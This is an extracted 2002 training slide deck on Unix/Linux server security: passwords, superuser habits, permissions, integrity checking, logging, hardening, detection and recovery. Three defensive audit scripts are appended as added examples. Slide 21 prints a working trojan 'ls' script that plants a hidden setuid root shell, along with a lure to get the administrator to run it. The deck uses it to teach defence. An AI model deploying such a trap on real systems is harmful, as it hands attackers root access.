Server management and security

Uploader: lx****y   Document ID: 243018848   Uploaded: 2024-09-13   Format: PPT   Pages: 86   Size: 245KB
[1] Server management and security
    September 10, 2002
    Ko, YangWoo
    ccTLD name server training

[2] Note
    - Contents are NOT mine. Most of them are from the wonderful books "Practical Unix and Internet Security" and "Real World Linux Security". Others are extracted from various good resources including:
      - Linux Security FAQ
      - Solaris Security FAQ
      - Sun Solaris / HP-UX / Tru64 Unix man pages

[3] Table of contents
    - Before we start
    - Security basics
    - Unix / Linux server security
    - System setup guide
    - Detection
    - Recovery

[4] Module 1 : Before we start

[5] Welcome to wild Internet !
    - Quote from Crypto-Gram (June 15, 2001):
      "A random computer on the Internet is scanned dozens of times a day. The life expectancy of a default installation of Red Hat 6.2 server, or the time before someone successfully hacks it, is less than 72 hours. A common home user setup, with Windows 98 and enabled, was hacked five times in four days. Systems are subjected to NetBIOS scans an average of 17 times a day. And the fastest time for a server being hacked: 15 minutes after plugging it into the network."

[6] No system is ever perfectly secure.

[7] But, still we need security.
    - Any number of toolkits exist that allow total amateurs to become holy terrors.
    - The good news is that if you can beat the popular intrusion toolkits, 90 percent of the bad guys will go bother somebody else who's less secure.

[8] System security in a page
    - The Seven Most Deadly Sins
      - Weak Passwords
      - Open Network Ports
      - Old Software Version
      - Poor Physical Security
      - Insecure CGIs
      - Stale and Unnecessary Accounts
      - Procrastination

[9] Module 2 : Security basics

[10] Security requirements
    - Confidentiality
    - Integrity
    - Authentication
    - Non-repudiation
    - Availability
    - Access control
    - Combined
      - User authentication used for access control
      - Non-repudiation combined with authentication

[11] Some terminologies
    - System security / network security
    - Passive attack / active attack
      - sniffing / spoofing
    - Two models
      - Access control
        - discretionary access control vs. mandatory access control
      - Audit

[12] Security policy
    - Simple and generic policy for the system, which users can readily understand and follow.
    - Starting point : That which is not permitted is prohibited.
    - Setup steps
      (1) Identify what you are trying to protect.
      (2) Determine what you are trying to protect it from.
      (3) Determine how likely the threats are.
      (4) Implement measures which will protect your assets in a cost-effective manner.
      (5) Review & improve the process continuously.

[13] Security policy (continued)
    - References
      - rfc2196 : Site Security Handbook
    - Samples

[14] Module 3 : Unix / Linux server security
    - Password
    - Superuser
    - Account
    - Integrity
    - Log and Audit
    - Programmed threats
    - TCP/IP

[15] Module 3-1 : Password

[16] Bad passwords
    - Your name, spouse's name, partner's name, pet's name, child's name, friend's name, boss's name
    - Operating system, hostname, username
    - Phone number, license plate number, birth date, social security number
    - Words in the dictionary
    - Simple patterns of letters on the keyboard (qwerty)
    - Passwords of all the same letter
    - Any of the above spelled backwards
    - Any of the above followed or prepended by a single digit

[17] Good passwords
    - Have both uppercase and lowercase letters.
    - Have digits and/or punctuation characters as well as letters.
    - May include some control characters and/or spaces.
    - Are easy to remember, so they do not have to be written down.
    - Are seven or eight characters long.

[18] The Thompson Test
    - Devised by Ken Thompson
    - Cracking algorithm
      - One to six ASCII characters
      - Seven or eight lowercase letters
      - Any word from a large dictionary such as hangman-words, or a word spelled backward or with the digit "1" instead of the letter "l", with the digit "0" instead of the letter "o", or with the digit "3" instead of the letter "e".
      - Any pair of words from a large dictionary, or words spelled backwards.

[19] Module 3-2 : Superuser

[20] Who is superuser ?
    - UID of 0
    - Any username can be the superuser.
    - Normal security checks and constraints are ignored for the superuser.
    - Superuser is not for casual use.
    - Do not login as superuser; use /bin/su with the "-" option instead.

[21] Simple trap to steal superuser
    - Premise : root's PATH starts with "."
    - Contents of shell script ls
        #!/bin/sh
        cp /bin/sh ./junk/.ss
        chmod 4555 ./junk/.ss
        rm -f $0
        exec /bin/ls ${1+"$@"}
    - Set a trap
        % cd
        % chmod 700 .
        % touch ./-f
    - All that is left to do is tell the administrator: "I have a funny file in my directory I can't seem to delete."

[22] Several tricks for superusers
    - Test complex commands in a non-destructive way before running them.
      - rm foo*.bar "after" echo foo*.bar
      - alias rm='rm -i'
    - Only become root to do a single specific task. Stay in a normal user shell until you are sure what needs to be done by root.
    - Command path
      - Minimum and trusted directories only
      - Never include "."
      - No writable directories

[23] Several tricks for superusers (continued)
    - Never use r-utilities (e.g. rlogin, rsh). Never create .rhosts for root.
    - No login from remote
      - Linux, HPUX : /etc/securetty lists the ttys from which root can log in
      - Solaris : /etc/default/login, CONSOLE=/dev/console
    - Always be slow and deliberate running as root. Think before you type.

[24] Module 3-3 :

[25] -rwxr--r--
    - First character : file type
      - "-" : plain file
      - d : directory
      - c : character device (tty, printer)
      - b : block device (disk, CD-ROM)
      - l : symbolic link
      - s : socket
      - = or p : FIFO
    - Characters 2-4 : access granted to owner (r : read / w : write / x : execute)
    - Characters 5-7 : access granted to group members
    - Characters 8-10 : access granted to others

[26] SUID/SGID/sticky bits
    - SUID (set uid) : Processes are granted access to system resources based on the user who owns the file.
    - SGID (set gid)
      - (For file) Same as SUID except the group is affected.
      - (For directory) Files created in that directory will have their group set to the directory's group.
    - sticky bit : If set on a directory, then a user may only delete files that he owns or for which he has explicit write permission granted, even when he has write access to the directory. (e.g. /tmp)

[27] tips
    - Finding SUID and SGID files
        # find / \( -local -o -prune \) \( -perm -004000 -o -perm -002000 \) -type f -print
      (-xdev can be used in place of -local/-prune)
    - Files without an associated owner/group can be a signal of compromise.
        # find / \( -nouser -o -nogroup \) -print
    - Users are not allowed to have .rhosts files.
        # find /home -name .rhosts -print

[28] tips (continued)
    - Turning off SUID / SGID in mounted filesystems : use nosuid (and nodev if possible) when mounting remote filesystems or allowing users to mount floppies or CD-ROMs.
    - Device files may be created as a backdoor after a compromise.
        # find / \( -local -o -prune \) \( -type c -o -type b \) -exec ls -l {} \;

[29] Critical system files
    - These files should be backed up and compared with the saved version frequently.
      - /etc/passwd, /etc/shadow, /etc/group
      - /etc/rc*
      - /etc/ttys, /etc/ttytab, /etc/inittab
      - /usr/lib/crontab, /usr/spool/cron/crontabs/, /etc/crontab
      - /usr/lib/aliases
      - /etc/exports, /etc/dfs/dfstab
      - /etc/netgroups
      - /etc/fstab, /etc/vfstab
      - /etc/inetd.conf
      - UUCP related files

[30] Module 3-4 : Account

[31] Dangerous accounts
    - Accounts without passwords
        # cat /etc/passwd | awk -F: 'length($2) == 0 { print $1 }' > /tmp/users1$$

[32-33] (only this fragment of these two slides survives in the extracted text)
        # cat-passwd | /bin/awk -F: '{ print $1 }' | /bin/sort -u > /tmp/users2$$
        # /bin/comm -13 /tmp/users1$$ /tmp/users2$$
        # /bin/rm -f /tmp/users[12]$$

[34] Module 3-5 : Integrity

[35] Simple examples
    - By metadata
        # cat /usr/adm/<filelist> | xargs ls -ilds > /tmp/now
        # diff -b /usr/adm/savelist /tmp/now
    - By checksum
        # find `cat /usr/adm/<filelist>` -ls -type f -exec md4 {} \; > /tmp/now
        # diff -b /usr/adm/savelist /tmp/now
      (<filelist> : the list of files to watch; savelist : the output saved from an earlier run)

[36] Tripwire
    - Tripwire is a tool that checks to see what has changed on your system. The program monitors key attributes of files that should not change, including binary signature, size, expected change of size, etc.
    - Where is it ?
      - Commercial version :
      - For Linux user :
      - For Unix user :

[37] Tripwire tutorial in a slide
    - Initial setup
      - download / build / install it
      - modify policy file (e.g. remove unnecessary files)
          # vi /etc/tripwire/twpol.txt
      - generate policy file
          # twadmin --create-polfile twpol.txt
      - build initial database
          # tripwire --init
    - check periodically
        # tripwire --check
    - reconcile differences (e.g. software installation)
        # tripwire --update --accept-all --twrfile report_file

[38] Module 3-6 : Log and audit

[39] Basics
    - Consider remote logging to secure log data.
    - List of log files
      - acct / pacct : Commands run by users
      - aculog : Dial-out modem (acu : automatic call unit)
      - lastlog : Most recent login success/fail times
      - loginlog : Bad login attempts
      - messages : Console / syslog facility
      - sulog : su command
      - utmp / utmpx : Each user currently logged in
      - wtmp / wtmpx : Login/out, shutdown/startup
      - xferlog : FTP file transfers

[40] Files and commands
    - lastlog file
      - lastlog (Linux only) : Displays last login time and location.
    - u/wtmp file
      - last : Displays login and logout information about users and terminals.
    - acct/pacct file
      - (Solaris 5.8) /usr/lib/acct/startup, shutacct : Starts or stops accounting.
      - (Solaris 5.8) acctcom, lastcomm : Displays the recent commands executed.

[41] Monitoring logs
    - logcheck (logsentry) : Extracts anything that might indicate a security violation or other abnormality, and informs via e-mail.

[42] Module 3-7 : Programmed threats

[43] Basic terms
    - Bug vs. malware (or malicious software)
    - Kinds of malware
      - Security tools and toolkits
      - Back doors and trap doors
      - Logic bombs
      - Viruses
      - Worms
      - Trojan horses
      - Bacteria and rabbits

[44] Against programmed threats
    - Back door
      - Do regular integrity checks.
      - Install software only from well-known sources.
      - Separate test bed and production system.
    - Trojan horse
      - Never execute anything until you're sure of the program or the inputs to the program.
      - Never run anything as root unless you absolutely must.

[45] Against programmed threats (continued)
    - Viruses
      - Use the same techniques used against back doors and Trojan horses.
      - Don't include nonstandard directories (including .) in your PATH.
      - Don't leave common binary directories unprotected; set the permission of commands to 555 or 511.
      - Make sure your own directories are writable only by you, not by your group or world.

[46] Against programmed threats (continued)
    - Worm
      - Prevention : If an intruder can enter your machine, so can a worm program.
      - If under attack
        - Call a computer incident response center to see if other sites have made similar reports.
        - Isolate your server to prevent spread.

[47] Module 3-8 : TCP/IP

[48] Vulnerabilities
    - ftp
      - Passwords are sent in plain text.
      - /etc/ : List of accounts that are NOT allowed to use ftp.
    - telnet
      - Passwords are sent in plain text.
      - Attacker can hijack the session.

[49] Vulnerabilities (continued)
    - smtp (sendmail)
      - Must be upgraded to 8.9.3 or higher. Current version is 8.12.6.
      - Check permissions of /var/spool/mqueue, sendmail.cf, /etc/aliases*, /etc/mail/mailertable* (owned by root, writable by owner only).

[50] Vulnerabilities (continued)
    - Sun RPC portmapper
      - Assigns the TCP/UDP ports used for RPC.
      - To improve security, turn it off if possible. Or
        - Replace it with Wietse Venema's version.
        - Block packets on port 111.
    - rexec, rsh, rlogin
      - Execute a remote program or login.
      - rexec transmits the password in plain text, and rsh/rlogin use the "trusted host/user" concept.
      - Disable rexec, and replace rsh/rlogin with ssh.

[51] Vulnerabilities (continued)
    - web
      - Yet another BIG topic. See references:
        - Lincoln D. Stein's FAQ
        - Paul Phillips' CGI security FAQ
        - NCSA's CGI security documentation

[52] Vulnerabilities (continued)
    - NFS
      - Limit exported and mounted filesystems
      - Export read-only and use root ownership
      - Remove group-write permission for files and directories
      - Do not export server executables and home directories
      - Do not allow users to log into the server
      - Use fsirand and set the portmon variable
      - Use showmount -e
      - Use secure NFS

[53] Vulnerabilities (continued)
    - tftp (UDP 69) : No security at all.
    - finger (79) : Provides user information.
    - POP (109, 110) : Username/password is sent in plain text.

[54] Module 4 : System setup guide

[55] Useful links for system setup
    - Solaris
      - Solaris/Unix Security Checklist Version 1.0
      - The Solaris Security FAQ
    - Linux
      - Securing Debian Manual

[56] System setup steps (1/2)
    - Disconnect the system from the network.
    - Install a minimal Operating System.
    - Install the recommended patches.
    - Use BIOS/EEPROM security.
    - Securing root account : Force root to login through su.
    - Check environments : default umask (027), PATH
    - Apply a hardening script if available.
    - Direct syslog to loghost.

[57] System setup steps (2/2)
    - Create minimal accounts and disallow login.
    - Let minimal services run; /etc/rc*, /etc/inet.d
    - Use tcpwrapper for network services.
    - Install Secure Shell and encourage its use.
    - Install an integrity checker (e.g. Tripwire).
    - Test it periodically, e.g. Nessus, COPS, Tiger, ...
    - Monitor it forever : Check logs, login/outs, commands

[58] Module 5 : Detection
    - Monitoring
    - Scanning
    - Handling

[59] Monitoring (1/2)
    - Log (logcheck)
      - Propagate it using loghost and e-mail.
      - Check it.
    - Network port (netstat)
      - A Trojan horse may use network ports.
    - Network (tcpdump)

[60] Monitoring (2/2)
    - Process (ps)
      - Check suspicious processes, e.g. compiler.
      - Record the typical size of daemons and important programs to detect Trojan horses.
    - Load (uptime)

[61] Scanning
    - Find suspicious files.
    - Run Tripwire.
    - Detect promiscuous network interfaces. (see next page)

[62] Perl script to detect sniffer
        #!/usr/bin/perl
        # Lists every interface that ifconfig reports in PROMISC mode and mails the list.
        my $ifconfig = "/sbin/ifconfig";
        my $recips   = "root";        # mail recipient(s); adjust for your site
        my %PROMISC  = ();
        my $interface = "";
        open( IFCONFIG, "$ifconfig|" ) || die( "Error: cannot run ifconfig!" );
        while( <IFCONFIG> ) {
            $interface = $1 if m/^(\S+)/;           # a line starting in column 1 names an interface
            $PROMISC{$interface} = 1 if m/promisc/i; # its flag line mentions PROMISC
        }
        close( IFCONFIG );
        if( %PROMISC ) {
            open( MAIL, "|Mail -s 'Promisc mode' $recips" ) || die( "Error: cannot send mail" );
            print MAIL "Interfaces in Promisc mode: ", join( " ", sort keys %PROMISC ), "\n";
            close MAIL;
        }

[63] Handling incidents
    - Don't panic
      - Is it really a security incident ?
      - Was any damage really done ?
      - Evidence or normal operation, that is the question.
    - Document
      - Write down everything you find, always noting the date and time.
    - Plan ahead !

[64] Module 6 : Recovery
    - Regaining control of system
    - Finding and repairing the damage
    - Tracing attacker

[65] Regaining control of system
    - Operate as an unprivileged user.
    - Check the integrity of the commands used.
    - Have stealth versions of crucial commands (ps / ls / tar / ...)
      - Build from open source. Or
      - Rename from an existing binary
          cd /home/larry/bin
          cp /bin/ls monthly
          cat text_file >> monthly
          (echo ls is monthly; md5sum monthly) | lpr
    - Processes must be killed with kill -9.

[66] Analyze Trojan horse
    - Save suspicious executables on (removable) media.
    - Analyze
      - strings Trojan
      - if not stripped, nm Trojan (see function names, syscalls)
      - run debugger (see stack trace)
    - Check files opened by the Trojan
      - (Linux) /proc/pid/fd
      - (Solaris) pfiles

[67] Prevent further damage
    - Drop connection (unplug LAN, modem)
    - Shutdown abruptly
      - Close database
      - Run sync (from a non-privileged user)
      - Press reset (or power) button
    - Boot again
      - Remove the system disk from the compromised system and connect it as a second disk to a secure system. (Or, boot from a secure boot floppy.)
      - Run fsck
      - Before coming up in multi-user mode, check cracker-generated email.

[68] Checking logs
    - Log files
      - /var/log/*
      - Shell history files (esp. for root)
      - Mailboxes (mbox, /?/spool/mail, /?/spool/mqueue)
      - Firewall logs, ISP's log
      - tcpwrapper log (denied log only)
    - Other files
      - /tmp/*
      - Hidden directories (e.g. /home/*/.?*)
      - Other files starting with "."

[69] Finding cracker-altered files
    - Use tools (e.g. Tripwire)
    - Compare with backups. GNU tar's "-d" option is very useful.
    - Rename any Trojan horse found to something obvious.
        mv /mnt2/tmp/ls /mnt/tmp/ls-CRACKED
        chmod 0 /mnt/tmp/ls-CRACKED
    - Find normal files hidden in /dev
        find /dev -type f -ls
    - Find set-UID programs

[70] Useful commands
    - With IP address (A.B.C.D)
        nslookup -type=any D.C.B.A.in-addr.arpa
        dig -x A.B.C.D
    - With domain name
        whois
    - Using ping
    - See the distance
        Using traceroute

[71] Module 7 : D.I.Y.
    - Requirement
    - Analysis
    - Plan and Do

[72] What assets do I have ?
    - Classification of assets
      - Hardware : Server / PC / Storage device / Printer
      - Network
        - Network distribution component (e.g. router, hub, switch)
        - Network service host (e.g. directory, NMS)
        - Network connection / Cabling
      - Data (e.g. database, agreement, policy, guideline)
      - Software
      - Human
      - Environment (e.g. UPS, air conditioner, cabinet)

[73] How valuable are they ? (1/4)
    - Review documentation
      - List of all servers
      - List of all security products in place
      - Operation guidelines
    - Interview with operational personnel
    - Valuation methods
      - CIA : Confidentiality / Integrity / Availability
      - Cost of loss

[74] How valuable are they ? (2/4)
    - Confidentiality
      - 5 : Top secret
      - 4 : Secret
      - 3 : Limited
      - 2 : Limited within organization (ordinary documents)
      - 1 : Open

[75] How valuable are they ? (3/4)
    - Integrity
      - 5 : Critical damage to operation
      - 1 : No (or very little) damage to operation
    - Availability
      - 5 : Non stop
      - 4 : Recovery within 4 hours
      - 3 : Recovery within 8 hours
      - 2 : Recovery within 12 hours
      - 1 : Recovery within 24 hours

[76] How valuable are they ? (4/4)
    - Cost of loss
      - 5 : Serious loss (e.g. bankruptcy)
      - 4 : Major loss (e.g. discontinuance of some businesses)
      - 3 : Significant loss (e.g. discontinuance of some tasks)
      - 2 : Loss (e.g. US$ 10,000)
      - 1 : Trivial loss (e.g. US$ 1,000)

[77] Define analysis areas
    - Network / system security
      - Service daemons
      - Backdoors, vulnerable files
      - Misuse by users
      - User accounts
      - Log management
    - Network configuration
      - Network device management
    - Database security
    - Physical security
    - Security management
      - Compliance assessment
      - Security policy assessment
      - Contingency planning

[78] Analysis
    - Automated analysis, e.g. Nessus
    - Manual analysis : OS checklists

[79] Sample results : Service daemons
    - Problems
      - Some old-version daemons have buffer overflow vulnerabilities.
      - Unnecessary daemons are running.
    - To do
      - Remove unnecessary daemons.
      - Keep necessary daemons up to date.
      - Run a security scanner periodically.

[80] Sample results : Backdoors, vulnerable files
    - Problems
      - No backdoor was found, but there is no countermeasure for future backdoors.
    - To do
      - Install and run Tripwire periodically.

[81] Sample results : Misuse by users
    - Problems
      - Sendmail's vulnerability can lead to root compromise.
    - To do
      - Remove it if unnecessary.
      - Keep it up to date if necessary.

[82] Sample results : User accounts
    - Problems
      - Superuser accounts are shared by administrators and developers.
      - Weak passwords are found.
    - To do
      - Define each system's usages clearly.
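The "Simple examples" integrity slide (by metadata, by checksum) sketches a snapshot-and-diff approach with ls -ilds and md4. The script below is an added example, not part of the slides or of either book they cite: it records a SHA-256 hash plus mode, owner and size for every regular file, then classifies the differences against a saved snapshot as changed, removed or added, and runs itself on a constructed temporary tree that is trojaned in the three ways the deck describes. It assumes GNU coreutils (sha256sum, stat -c) and a POSIX sh; the file names and contents in demo are constructed for the demonstration.

```shell
#!/bin/sh
# Added example (not from the slides): snapshot-and-compare integrity check.
# Assumes GNU coreutils: sha256sum and stat -c.

# Emit one line per regular file under $1: "<sha256> <mode> <owner> <size> <path>"
snapshot() {
    find "$1" -type f -print | LC_ALL=C sort | while IFS= read -r f; do
        sum=$(sha256sum "$f" | cut -d' ' -f1)
        printf '%s %s %s\n' "$sum" "$(stat -c '%a %U %s' "$f")" "$f"
    done
}

# Compare a saved snapshot ($1) against the live tree ($2); print
# "changed <path>", "removed <path>" and "added <path>" lines.
compare() {
    saved=$1; dir=$2
    tmp=$(mktemp -d)
    snapshot "$dir" > "$tmp/now"
    LC_ALL=C sort "$saved"   > "$tmp/old.lines"
    LC_ALL=C sort "$tmp/now" > "$tmp/now.lines"
    cut -d' ' -f5- "$saved"   | LC_ALL=C sort > "$tmp/old.paths"
    cut -d' ' -f5- "$tmp/now" | LC_ALL=C sort > "$tmp/now.paths"
    # A saved line with no identical live line means the file is gone or its
    # hash/metadata changed; the path lists decide which of the two it is.
    LC_ALL=C comm -23 "$tmp/old.lines" "$tmp/now.lines" | cut -d' ' -f5- \
        | LC_ALL=C sort > "$tmp/gone"
    LC_ALL=C comm -12 "$tmp/gone" "$tmp/now.paths"      | sed 's/^/changed /'
    LC_ALL=C comm -23 "$tmp/gone" "$tmp/now.paths"      | sed 's/^/removed /'
    LC_ALL=C comm -13 "$tmp/old.paths" "$tmp/now.paths" | sed 's/^/added /'
    rm -rf "$tmp"
}

# Constructed demonstration: baseline a tiny tree, then tamper with it the way
# the deck's examples do (replaced binary, hidden drop file, deleted config).
demo() {
    root=$(mktemp -d)
    mkdir -p "$root/bin" "$root/etc"
    printf 'echo hello\n' > "$root/bin/ls"
    printf 'root:x:0:0:root:/root:/bin/sh\n' > "$root/etc/passwd"
    snapshot "$root" > "$root.baseline"          # the "savelist" of the slide
    printf 'echo evil\n' > "$root/bin/ls"        # trojaned binary: hash and size change
    printf 'x\n' > "$root/bin/.ss"               # dropped hidden file
    rm "$root/etc/passwd"                        # deleted file
    compare "$root.baseline" "$root" | sed "s|$root||"
    rm -rf "$root" "$root.baseline"
}

demo
```

Running it prints `changed /bin/ls`, `removed /etc/passwd` and `added /bin/.ss`. Keeping the baseline off the monitored host (or at least off the monitored tree, as the deck's remote-logging advice suggests) matters: an intruder who can edit the saved snapshot can hide every change.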
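The superuser slides warn that a PATH starting with "." is all the "simple trap" needs, and the "Command path" rules ask for trusted, non-writable, absolute directories only. The following audit is an added example, not from the slides: it takes a PATH string apart and reports every entry that is ".", empty, relative, missing, or group/world-writable, which is what a defender checks in root's profile before the trap can matter. It assumes a POSIX sh and a find that supports -maxdepth (GNU and BSD both do); the directories in demo are constructed.

```shell
#!/bin/sh
# Added example (not from the slides): check a PATH value against the
# "Command path" rules of the superuser slides.

# Print one finding per offending entry of the PATH string in $1:
#   dot <entry>       "." or an empty entry (both mean "the current directory")
#   relative <entry>  not anchored at "/", so it changes with the working directory
#   missing <entry>   the directory does not exist
#   writable <entry>  group- or world-writable: anyone can drop a trojan there
audit_path() {
    printf '%s\n' "$1" | tr ':' '\n' | while IFS= read -r d; do
        case "$d" in
            ""|.)  echo "dot ${d:-<empty>}"; continue ;;
            /*)    ;;
            *)     echo "relative $d"; continue ;;
        esac
        if [ ! -d "$d" ]; then
            echo "missing $d"; continue
        fi
        # -perm -020 / -002: group or others hold the write bit on the directory itself
        if [ -n "$(find "$d" -maxdepth 0 \( -perm -020 -o -perm -002 \) -print)" ]; then
            echo "writable $d"
        fi
    done
}

# Constructed demonstration: one safe directory, one loose directory, plus the
# classic mistakes (".", a relative entry, a directory that no longer exists).
demo() {
    safe=$(mktemp -d);  chmod 755 "$safe"
    loose=$(mktemp -d); chmod 777 "$loose"
    audit_path ".:$safe:$loose:bin:/nonexistent-dir-xyz" \
        | sed "s|$safe|SAFE|; s|$loose|LOOSE|"
    rmdir "$safe" "$loose"
}

demo
```

The demo reports `dot .`, `writable LOOSE`, `relative bin` and `missing /nonexistent-dir-xyz`; the safe directory produces nothing. An empty entry (a leading or trailing colon, or "::") is flagged just like "." because the shell treats it the same way.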
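The "Who is superuser?" slide makes the point that any account with UID 0 is root, and the "Dangerous accounts" slide starts with accounts whose password field is empty. The awk audit below is an added example, not from the slides: it checks a passwd-format file for empty password fields, UID 0 accounts other than root, and duplicated UIDs, and runs over a constructed sample that hides two such accounts among ordinary ones. It assumes the classic seven-field /etc/passwd layout; on a shadowed system the password field holds "x" and the empty-password rule has to be applied to /etc/shadow instead.

```shell
#!/bin/sh
# Added example (not from the slides): audit a passwd-format file for the
# account problems the deck lists. Assumes the 7-field /etc/passwd layout.

# Print one finding per line for the passwd-format file in $1.
audit_passwd() {
    awk -F: '
        NF != 7                 { printf "malformed line %d\n", NR; next }
        length($2) == 0         { print "empty-password " $1 }
        $3 == 0 && $1 != "root" { print "extra-uid0 " $1 }
        seen[$3]++              { print "duplicate-uid " $1 " (uid " $3 ")" }
    ' "$1"
}

# Constructed sample: an account with no password and a second UID 0 account.
sample_passwd() {
    cat <<'EOF'
root:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
guest::1001:1001:Guest:/home/guest:/bin/sh
toor:x:0:0:second superuser:/:/bin/sh
larry:x:1002:1002:Larry:/home/larry:/bin/sh
EOF
}

demo() {
    f=$(mktemp)
    sample_passwd > "$f"
    audit_passwd "$f"
    rm -f "$f"
}

demo
```

The sample yields `empty-password guest`, `extra-uid0 toor` and `duplicate-uid toor (uid 0)`. The same three rules fit naturally into the deck's "compare critical system files with the saved version" routine: run the audit from cron and diff its output against the last accepted run.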